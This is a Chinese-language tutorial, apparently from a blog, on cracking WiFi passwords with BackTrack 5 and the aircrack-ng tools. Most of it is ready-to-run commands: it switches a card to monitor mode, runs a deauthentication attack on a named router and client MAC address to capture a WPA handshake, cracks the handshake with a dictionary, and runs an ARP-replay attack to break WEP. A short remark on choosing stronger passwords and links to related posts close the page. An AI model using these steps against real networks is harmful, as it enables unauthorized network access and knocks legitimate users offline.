(1)首先檢視網路連線:
root@bt:~# ifconfig -a #檢視所有連線
(2)啟用無線網絡卡
root@bt:~#ifconfig wlan0 up
(3)設定無線網絡卡為混雜模式
(4)再次檢視網路連線發現多了個mon0介面,以下就通過mon0開始破解無線網路
(1)首先找到目標,看哪個網路容易破解,一般有客戶端連線的路由器才比較容易破解
root@bt:~#airodump-ng mon0
(2)鎖定目標,開始嘗試破解目標網路,抓包儲存
root@bt:~#airodump-ng -c 11 -w 20121025 mon0
引數說明:
-c 指定掃瞄通道
-c 11 只掃瞄通道為11的無線網線
-w 儲存資料報到檔案
現在的wpa破解只能是通過暴力破解,主要抓到客戶端與路由器的握手包(handshake)就有可能通過字典猜解 ,
(3)在有客戶端連線的情況下,可以用deauh攻擊讓客戶端下線,客戶端一般都會自動連線,這時就可以抓到握手包了。
對客戶端進行deauth攻擊
root@bt:~#aireplay-ng -0 3 -a e0:05:c5:a7:bb:92 -c 98:0c:82:ac:1a:10 mon0
引數說明:-0 攻擊模式是deauth, -0 3 傳送3次deauth攻擊
-a ap的mac 位址
-c 客戶端位址
注入後我連線到路由器的手機馬上掉線,過幾秒鐘又自動連線了
攻擊的時候同時抓包,抓包視窗會提示抓到握手包: wpa handshake:e0:05:c5:a7:bb:92
(4)deauth攻擊的目的已經達到,現在可以停止抓包了,開始破解wpa密碼:
root@bt:~#aircrack-ng -w wpa.txt 20121025-01.cap
引數說明:-w 字典檔案
選擇有handshake的無線網路,開始破解
生日密碼被秒破了【驚恐】!!!
wep破解是100%能破解出來的,不管多複雜的密碼,只要能夠抓夠足夠的ivs
(1)還是先查詢目標網路:
root@bt:~#airodump-ng –encrypt wep mon0 #只抓wep加密的網路
(2)找到目標網路之後開始抓包儲存
root@bt:~#airodump-ng –ivs -w 20121025 -c 11 mon0
(3)為了能快速收集ivs,在有客戶端的情況下進行arp request 攻擊
root@bt:~#aireplay-ng -3 -b e0:05:c5:a7:bb:92 -h 98:0c:82:ac:1a:10 mon0
(4)收到5000個以上ivs之後,就可以破解了,如果破解不成功再多收集ivs
破解成功!wep加密基本是100%破解成功,所以一般不要設定加密方式為wep,不過不要以為wpa/wpa2加密就高枕無憂了,
wpa密碼要設定盡量雜點,不要用純數字,8~10位的純數字密碼一般的破解字典都有。
**:
Ubuntu新增BT5軟體源
如果你已經有bt5的源,如下面的 deb revolution main microverse non free testing deb revolution main microverse non free testing deb revolution main microverse non fr...
BT5中配置簡單測試蜜罐
說明 這只是乙個簡單的測試icmp和tcp,udp包,配置環境為虛擬機器中的bt5的ip為192.168.1.105,主機ip為192.168.1.100 1.配置的網段為192.168.1.0 24 farpd 192.168.1.0 24 2.配置honeyd.conf檔案 create win...
Wifi 安全 使用BT5破解wifi
破解無線網路的wpa wpa2 psk的密碼比起wep難很多,越來越多的人放棄wep加密方式而是用更安全的wpa和wpa2加密家庭wifi.許多人安裝backtrack也是為了要破解密碼,然而破解wpa wpa2需要的不只是時間,還需要運氣.本站不提倡破解無線網路密碼,破解他人ap的密碼是違法的行為...